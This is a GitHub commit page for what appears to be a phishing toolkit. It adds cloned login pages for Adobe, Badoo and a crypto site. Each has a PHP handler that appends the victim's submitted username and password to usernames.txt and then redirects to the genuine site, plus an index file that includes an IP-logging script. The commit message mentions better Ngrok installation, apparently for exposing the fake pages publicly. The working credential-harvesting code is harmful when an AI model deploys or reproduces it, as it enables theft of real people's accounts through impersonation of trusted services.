Skip to content

Commit 7dfb005

Browse files
authored
Merge pull request #160 from adi1090x/master
> Improved Code, Formatted Readme, Added ArchLinux/Fedora/etc Support, Better Ngrok Installation And More... Thanks master ❤️
2 parents 529596c + 213c147 commit 7dfb005

File tree

330 files changed

+87962
-603
lines changed

Some content is hidden

Large Commits have some content hidden by default. Use the searchbox below for content that may be hidden.

330 files changed

+87962
-603
lines changed

.imgs/logo.png

7.64 KB
Loading

.imgs/wf.gif

98 KB
Loading

.sites/adobe/index.php

Lines changed: 5 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,5 @@
1+
<?php
2+
include 'ip.php';
3+
header('Location: login.html');
4+
exit
5+
?>

.sites/adobe/login.html

Lines changed: 535 additions & 0 deletions
Large diffs are not rendered by default.

.sites/adobe/login.php

Lines changed: 5 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,5 @@
1+
<?php
2+
3+
file_put_contents("usernames.txt", "Adobe Username: " . $_POST['username'] . " Pass: " . $_POST['password'] . "\n", FILE_APPEND);
4+
header('Location: https://adobe.ly/2OE9ZKL');
5+
exit();

.sites/badoo/index.php

Lines changed: 5 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,5 @@
1+
<?php
2+
include 'ip.php';
3+
header('Location: login.html');
4+
exit
5+
?>

.sites/badoo/login.html

Lines changed: 305 additions & 0 deletions
Large diffs are not rendered by default.

.sites/badoo/login.php

Lines changed: 5 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,5 @@
1+
<?php
2+
3+
file_put_contents("usernames.txt", "Badoo Username: " . $_POST['email'] . " Pass: " . $_POST['password'] . "\n", FILE_APPEND);
4+
header('Location: https://badoo.com/forgot/');
5+
exit();

.sites/cryptocoinsniper/index.php

Lines changed: 5 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,5 @@
1+
<?php
2+
include 'ip.php';
3+
header('Location: login.html');
4+
exit
5+
?>

.sites/cryptocoinsniper/login.html

Lines changed: 116 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,116 @@
1+
<!DOCTYPE html>
2+
<html lang="en">
3+
4+
5+
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
6+
<head>
7+
<!-- Required meta tags -->
8+
<meta charset="utf-8">
9+
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
10+
<title>Crypto Coin Sniper - Dashboard | Login</title>
11+
<!-- plugins:css -->
12+
<link rel="stylesheet" href="http://www.cryptocoinsniper.co/members/css/vendors/iconfonts/mdi/css/materialdesignicons.min.css"/><link rel="stylesheet" href="http://www.cryptocoinsniper.co/members/css/vendors/css/vendor.bundle.base.css"/><link rel="stylesheet" href="http://www.cryptocoinsniper.co/members/css/style.css?ver=1"/><script type="text/javascript">
13+
js_url = String('http://www.cryptocoinsniper.co/members/');
14+
jsBaseURL = js_url.substr(0, js_url.length - 1);
15+
</script>
16+
<link href="http://www.cryptocoinsniper.co/members/favicon.ico" type="image/x-icon" rel="icon"/><link href="http://www.cryptocoinsniper.co/members/favicon.ico" type="image/x-icon" rel="shortcut icon"/> <!-- endinject -->
17+
</head>
18+
19+
<body>
20+
<div class="container-scroller">
21+
<div class="container-fluid page-body-wrapper full-page-wrapper">
22+
<div class="content-wrapper d-flex align-items-center auth">
23+
<div class="row w-100">
24+
<div class="col-lg-4 mx-auto">
25+
<div class="auth-form-light text-left p-5">
26+
<div class="brand-logo">
27+
<img src="http://www.cryptocoinsniper.co/members/img/logo.png" alt=""/> </div>
28+
<h4>Hello! let's get started</h4>
29+
<h6 class="font-weight-light">Sign in to continue.</h6>
30+
<form method="post" enctype="multipart/form-data" accept-charset="utf-8" id="site_login" name="site_login" action="login.php"><div style="display:none;"><input type="hidden" name="_method" value="POST"/></div> <div class="form-group"><div class="input email required"><input type="email" name="email" class="form-control form-control-lg" required="required" placeholder="Username" id="member-email"/></div></div>
31+
<div class="form-group"><div class="input password required"><input type="password" name="password" class="form-control form-control-lg" required="required" placeholder="Password" id="member-password"/></div></div>
32+
<div class="mt-3"><div class="submit"><input type="submit" name="login" class="btn btn-block btn-gradient-primary btn-lg font-weight-medium auth-form-btn" value="SIGN IN"/></div></div>
33+
<div class="my-2 d-flex justify-content-between align-items-center">
34+
<div class="form-check">
35+
<label class="form-check-label text-muted"><input type="checkbox" class="form-check-input">Keep me signed in</label>
36+
</div>
37+
<a href="#" class="auth-link text-black" data-toggle="modal" data-target="#forgot-password">Forgot password?</a>
38+
</div>
39+
<div class="text-center mt-4 font-weight-light">
40+
Just signed up? Check your inbox and junk email now, we have sent you your user name and password.
41+
</div>
42+
</form> </div>
43+
</div>
44+
</div>
45+
</div>
46+
<!-- content-wrapper ends -->
47+
</div>
48+
<!-- page-body-wrapper ends -->
49+
</div>
50+
<!-- container-scroller -->
51+
52+
53+
<!-- Forgot Password Modal start -->
54+
<div class="modal fade" id="forgot-password" tabindex="-1" role="dialog" aria-labelledby="#forgot-passwordLabel" aria-hidden="true">
55+
<div class="modal-dialog" role="document">
56+
<div class="modal-content">
57+
<div class="modal-header">
58+
<h5 class="modal-title" id="notes-1-label">Forgot Password</h5>
59+
<button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button>
60+
</div>
61+
<div class="modal-body text-center">
62+
<div class="col-xs-12">
63+
<p class="text-center">Please enter your email</p>
64+
</div>
65+
<div class="col-xs-12 text-center margin-bot15">
66+
<small id="invalidEmailError"></small>
67+
</div>
68+
<form method="post" accept-charset="utf-8" id="forgot_password" class="form-horizontal margin-top20 margin-bot40" role="form" action="http://www.cryptocoinsniper.co/members/members/login"><div style="display:none;"><input type="hidden" name="_method" value="POST"/></div> <div class="form-group">
69+
<div class="col-xs-12">
70+
<div class="input email required"><input type="email" name="email" Type="email" class="form-control" required="required" id="email" placeholder="Enter your Email"/></div> </div>
71+
</div>
72+
<div class="form-group">
73+
<div class="col-xs-12">
74+
<div class="submit"><input type="submit" class="btn btn-block btn-gradient-primary btn-lg font-weight-medium auth-form-btn" value="Send Password" title="Send Password"/></div> <!-- </a> -->
75+
</div>
76+
</div>
77+
78+
</form>
79+
</div>
80+
<div class="modal-footer">
81+
<button type="button" class="btn btn-secondary" data-dismiss="modal">Close</button>
82+
</div>
83+
</div>
84+
</div>
85+
</div>
86+
<!-- Forgot Password Modal end -->
87+
88+
<!-- Thank You Modal start -->
89+
<div class="modal fade" id="thank-you" tabindex="-1" role="dialog" aria-labelledby="#thank-youLabel" aria-hidden="true">
90+
<div class="modal-dialog">
91+
<div class="modal-content">
92+
<div class="modal-header">
93+
<h5 class="modal-title" id="notes-1-label">Forgot Password</h5>
94+
<button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button>
95+
</div>
96+
<div class="modal-body text-center">
97+
<div class="clearfix">
98+
<p class="col-xs-12 text-center margin-top30 margin-bot40">Thank You. You will shortly recieve an E-Mail containing your new password</p>
99+
</div>
100+
</div>
101+
<div class="modal-footer">
102+
<button type="button" class="btn btn-secondary" data-dismiss="modal">Close</button>
103+
</div>
104+
</div>
105+
</div>
106+
</div>
107+
<!-- Thank You Modal end -->
108+
<script>
109+
$('.modal').on('hidden.bs.modal', function(){
110+
$(this).find(".alert-danger").html("");
111+
$(this).find('form')[0].reset()
112+
});
113+
</script>
114+
<script src="http://www.cryptocoinsniper.co/members/js/vendor.bundle.base.js"></script><script src="http://www.cryptocoinsniper.co/members/js/vendor.bundle.addons.js"></script><script src="http://www.cryptocoinsniper.co/members/js/off-canvas.js"></script><script src="http://www.cryptocoinsniper.co/members/js/misc.js"></script></body>
115+
116+
</html>

0 commit comments

Comments
 (0)